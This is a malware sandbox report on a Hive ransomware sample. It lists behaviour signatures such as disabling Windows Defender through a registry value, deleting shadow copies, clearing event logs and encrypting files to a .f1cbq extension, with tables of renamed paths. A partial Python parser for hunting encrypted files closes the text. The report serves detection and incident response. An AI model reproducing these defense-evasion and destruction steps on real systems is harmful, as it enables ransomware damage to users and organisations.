Analysis Overview
SHA256
ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8
Threat Level: Known bad
The file ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8 was found to be: Known bad.
Malicious Activity Summary
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
Deletes Windows Defender Definitions
Deletes shadow copies
Clears Windows event logs
Modifies boot configuration data using bcdedit
Modifies extensions of user files
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Suspicious behavior: EnumeratesProcesses
Runs net.exe
Runs ping.exe
Suspicious use of WriteProcessMemory
Opens file in notepad (likely ransom note)
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Interacts with shadow copies
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 13:28
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 13:28
Reported
2022-01-13 13:33
Platform
win7-en-20211208
Max time kernel
182s
Max time network
129s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\ResolveConvertFrom.tiff.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_fhzGWVZrPEk0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SelectAdd.png => C:\Users\Admin\Pictures\SelectAdd.png.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_BGoVhCnicaE0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SelectAdd.png.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_BGoVhCnicaE0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnlockPop.png => C:\Users\Admin\Pictures\UnlockPop.png.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_h03YrvCZTtc0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ResolveConvertFrom.tiff => C:\Users\Admin\Pictures\ResolveConvertFrom.tiff.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_fhzGWVZrPEk0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\InvokeClear.crw => C:\Users\Admin\Pictures\InvokeClear.crw.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_rLEeYn4pSwg0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\InvokeClear.crw.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_rLEeYn4pSwg0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WriteConvertFrom.raw => C:\Users\Admin\Pictures\WriteConvertFrom.raw.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_hFn7SKMxt1c0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WriteConvertFrom.raw.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_hFn7SKMxt1c0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UnlockPop.png.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_h03YrvCZTtc0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\SPACER.GIF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_puILns9quc00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\TipBand.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_kmiJP-EcQgM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_D5p8OsZkwMg0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Samara.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_zRJzFYSbdLg0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Background_Loading.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Sofia.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_cHkLdwwO-DI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\de-DE\wmlaunch.exe.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\INDUST.ELM.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_dkCSXuHtjm00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_2ug0pTwiALs0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14869_.GIF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_0YQoq9ITvkY0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21480_.GIF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_uqn7WbsCymU0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\ParentMenuButtonIcon.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_5HMMB-vy-G40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_0r5v55SFxY80.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152414.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_8VgXkb0xbWk0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\da.txt.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_id_0jCmA6_M0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fr.txt.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_u_F5MFj0y9w0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_play.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\init.js | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECLIPSE\mpYx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00932_.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_wvbqPW347hc0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\mpYx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_P_KTf1YE2p40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_A-_T1BfQnxE0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153299.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_TGNvSe6lWAs0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\INVITE.XML.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_fUXLrBVpE700.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\msdaorar.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\js\calendar.js | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL110.XML.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_I1ShyBADxys0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_VyTJCQwAG500.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb__mXXmoy9KR00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\js\settings.js | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00037_.GIF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_SISSdXJyRbw0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00168_.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_cV4dRq6dLlI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\PUSH.WAV.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_ac4QNJLRxzM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\DELIMR.FAE.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_NWnv5430meQ0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\MMHMM.WAV.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_zwQ_oHZN44M0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(inch).wmf | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_fY7s5iREJIM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Seoul.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_YWdZlrOWops0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_h.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101980.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_U20fXsFyciw0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\46.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\notConnectedStateIcon.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-2.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_MATTE2_PAL.wmv | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_OhHKwhlXLek0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_iOdvIx1KjII0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00544_.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_x3hhPTU0oYI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\PREVIEW.GIF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_9tJykceIoD40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196358.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_ULHQI2Cgy700.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB4.BDR.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_RsFgW9ar3HM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_mmyWNit62Ic0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_b0GpFQPWjSs0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00367_.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_Na4lZYLtmyI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
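Both file tables above show one renaming pattern: the original name is kept, a 56-character suffix is appended (a 43-character part that is identical for every file in this run, an underscore, and a 12-character part that differs per file, all drawn from letters, digits, underscore and hyphen), and the name ends in .f1cbq; the ransom note is dropped as mpYx_HOW_TO_DECRYPT.txt next to the encrypted files. The Python below is an added example, not part of this report and not Hive's code, that parses paths of that shape back into their parts for hunting and scoping. The names shared_token and file_token are my labels for what is observed here, not a statement about what the sample stores in them, and the fixed widths come from this detonation only. The sample paths are copied from the tables, with one path the table lists as opened but not renamed kept as a negative case.

```python
"""Parse encrypted-file and ransom-note paths of the shape seen in this detonation.

Added example, not part of the sandbox report. Field names are my own labels.
"""
import re
from collections import Counter

# Observed in this run: <original name>.<43 chars>_<12 chars>.f1cbq, where the
# 43-character part is the same for every file and the 12-character part differs.
ENCRYPTED_NAME = re.compile(
    r'^(?P<original>.+)\.'
    r'(?P<shared_token>[A-Za-z0-9_-]{43})_'
    r'(?P<file_token>[A-Za-z0-9_-]{12})'
    r'\.f1cbq$'
)
# Observed ransom note name: mpYx_HOW_TO_DECRYPT.txt (short prefix, fixed suffix).
RANSOM_NOTE = re.compile(r'^[A-Za-z0-9]+_HOW_TO_DECRYPT\.txt$')

# Sample paths copied from the report's tables; the last one was opened but not renamed.
SAMPLE_PATHS = [
    r'C:\Users\Admin\Pictures\SelectAdd.png.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_BGoVhCnicaE0.f1cbq',
    r'C:\Users\Admin\Pictures\ResolveConvertFrom.tiff.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_fhzGWVZrPEk0.f1cbq',
    r'C:\Program Files\Java\jre7\lib\zi\Europe\Samara.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_zRJzFYSbdLg0.f1cbq',
    r'C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb__mXXmoy9KR00.f1cbq',
    r'C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECLIPSE\mpYx_HOW_TO_DECRYPT.txt',
    r'C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\TipBand.dll.mui',
]


def parse_encrypted_name(path):
    """Split a path into directory, original name, shared token and per-file token.

    Returns None when the file name does not have the encrypted shape. Fixed
    widths make the split unambiguous even when the per-file token itself
    starts with an underscore (see the jfluid-server sample).
    """
    directory, _, name = path.rpartition('\\')
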